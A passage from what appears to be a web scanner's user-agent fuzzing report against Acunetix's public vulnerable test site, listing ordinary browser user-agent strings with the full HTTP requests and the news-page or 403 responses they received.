href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	GET
Parameter	Header User-Agent
Attack	msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Show / hide Request and Response
Request Header - size: 424 bytes.	GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:26 GMT Content-Length: 14133
Response Body - size: 14,133 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" bgcolor="#E6DCCF"> <tr><td colspan="7" bgcolor="#E6B873"><font size="2"><table class="Calendar" cellspacing="0" border="0" width="100%"> <tr><td width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></b></font></td><td align="center" width="70%"><font size="2"><b>December 2022</b></font></td><td align="right" width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></b></font></td></tr> </table></font></td></tr><tr><th align="center" abbr="Sunday" scope="col"><font size="2">Sun</font></th><th align="center" abbr="Monday" scope="col"><font size="2">Mon</font></th><th align="center" abbr="Tuesday" scope="col"><font size="2">Tue</font></th><th align="center" abbr="Wednesday" scope="col"><font size="2">Wed</font></th><th align="center" abbr="Thursday" scope="col"><font size="2">Thu</font></th><th align="center" abbr="Friday" scope="col"><font size="2">Fri</font></th><th align="center" abbr="Saturday" scope="col"><font size="2">Sat</font></th></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></font></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/images
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Show / hide Request and Response
Request Header - size: 282 bytes.	GET http://testaspnet.vulnweb.com/images HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:27 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/images
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Show / hide Request and Response
Request Header - size: 282 bytes.	GET http://testaspnet.vulnweb.com/images HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:27 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/images
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Show / hide Request and Response
Request Header - size: 282 bytes.	GET http://testaspnet.vulnweb.com/images HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:27 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/images
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Show / hide Request and Response
Request Header - size: 294 bytes.	GET http://testaspnet.vulnweb.com/images HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:27 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/images
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Show / hide Request and Response
Request Header - size: 360 bytes.	GET http://testaspnet.vulnweb.com/images HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:27 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/images
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Show / hide Request and Response
Request Header - size: 347 bytes.	GET http://testaspnet.vulnweb.com/images HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:29 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/images
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Show / hide Request and Response
Request Header - size: 310 bytes.	GET http://testaspnet.vulnweb.com/images HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:29 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
